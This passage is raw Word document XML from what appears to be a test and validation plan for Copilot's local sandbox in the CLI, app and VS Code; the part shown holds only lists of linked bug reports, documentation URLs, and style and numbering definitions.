      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bugs: </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">vscode#338112</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">vscode#342547</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">vscode#313938</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">vscode#337239</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:hyperlink r:id="rId45" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">cfgaudit#751</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bugs: </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">cli#5207</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">cli#3712</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">cli#4524</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">cli#4522</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">cli#4679</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">cli#4853</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">cli#5102</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">cli#5142</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">cli#4854</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:hyperlink r:id="rId3" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">cli#3861</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">app#4278</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">C# Corner — Testing GitHub Copilot sandbox rules before using them in a project (24 Sep 2026)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t xml:space="preserve">Second sweep (22 Oct 2026): </w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">app#4581</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">vscode#343231</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">vscode#341561</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">vscode#337310</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">vscode#297115</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:hyperlink r:id="rId46" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">vscode#338932</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:hyperlink r:id="rId47" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">vscode#341937</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">VS Code 1.142 release notes</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:sectPr>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
    </w:sectPr>
  </w:body>
</w:document>
</file>

<file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
<w:numbering xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:abstractNum w:abstractNumId="0">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:multiLevelType w:val="hybrid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left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="0"/>
  </w:num>
</w:numbering>
</file>

<file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
<w:styles xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:docDefaults>
    <w:rPrDefault>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:rPrDefault>
    <w:pPrDefault>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:pPrDefault>
  </w:docDefaults>
  <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
    <w:name w:val="Normal"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="360" w:after="120"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="280" w:after="100"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="80"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="80"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Quote">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="720" w:right="720"/>
      <w:pBdr>
        <w:left w:val="single" w:sz="12" w:space="8" w:color="A0A0A0"/>
      </w:pBdr>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:color w:val="404040"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Code">
    <w:name w:val="Code"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CodeChar"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:contextualSpacing/>
      <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CodeChar">
    <w:name w:val="Code Char"/>
    <w:link w:val="Code"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
      <w:sz w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:rPr>
      <w:color w:val="0563C1"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentTextChar"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CommentReference">
    <w:name w:val="annotation reference"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:default="1" w:styleId="TableNormal">
    <w:name w:val="Normal Table"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styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal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hyperlink" Target="https://github.com/github/copilot-cli/issues/3861" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/microsoft/vscode/issues/342468" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/microsoft/vscode/issues/339645" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/microsoft/vscode/issues/338294" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/microsoft/vscode/issues/336970" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/microsoft/vscode/issues/339641" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/microsoft/vscode/issues/336964" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/microsoft/vscode/issues/342467" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/microsoft/vscode/issues/342465" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/microsoft/vscode/issues/339644" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/microsoft/vscode/issues/340696" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/microsoft/vscode/issues/338112" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/github/copilot-cli/issues/5207" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/github/copilot-cli/issues/3712" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/microsoft/vscode/issues/313938" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/github/copilot-cli/issues/4524" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/github/copilot-cli/issues/4522" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/github/copilot-cli/issues/4853" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/github/copilot-cli/issues/4679" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/github/copilot-cli/issues/5102" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/github/copilot-cli/issues/5142" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/microsoft/vscode/issues/337239" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/github/app/issues/4278" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/github/copilot-cli/issues/4854" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/microsoft/vscode/issues/342547" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.c-sharpcorner.com/article/testing-github-copilot-sandbox-rules-before-using-them-in-a-project" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/github/app/issues/4581" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/microsoft/vscode/issues/343231" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://code.visualstudio.com/updates/v1_142" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/microsoft/vscode/issues/341561" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/microsoft/vscode/issues/337310" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/microsoft/vscode/issues/297115" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.github.com/en/copilot/how-tos/cloud-and-local-sandboxes/using-local-sandboxing" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.github.com/en/copilot/how-tos/cloud-and-local-sandboxes/configuring-local-sandbox-settings" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.github.com/en/copilot/concepts/agents/copilot-cli/understanding-local-sandboxing" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.github.com/en/copilot/concepts/security-governance-and-network-settings/about-cloud-and-local-sandboxes" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.github.com/en/copilot/reference/enterprise-administrators/enterprise-managed-settings" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.github.com/en/copilot/reference/hooks-reference" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://code.visualstudio.com/docs/agents/run/agent-sandboxing" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://code.visualstudio.com/docs/enterprise/manage-ai-settings" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/github/copilot-cli/issues/5089" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/microsoft/vscode/issues/319218" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cfgaudit/cfgaudit/issues/751" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/microsoft/vscode/issues/338932" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/microsoft/vscode/issues/341937" TargetMode="External"/></Relationships>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties">
  <Application>Claude Docs</Application>
  <AppVersion>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:title>Copilot Local Sandbox – Test &amp; Validation Plan (CLI · App · VS Code)</dc:title>
  <dc:description>Claude Docs node/3d5c15a9-dac4@24 docx-w7</dc:description>
  <cp:revision>24</cp:revision>
</cp:coreProperties>
</file>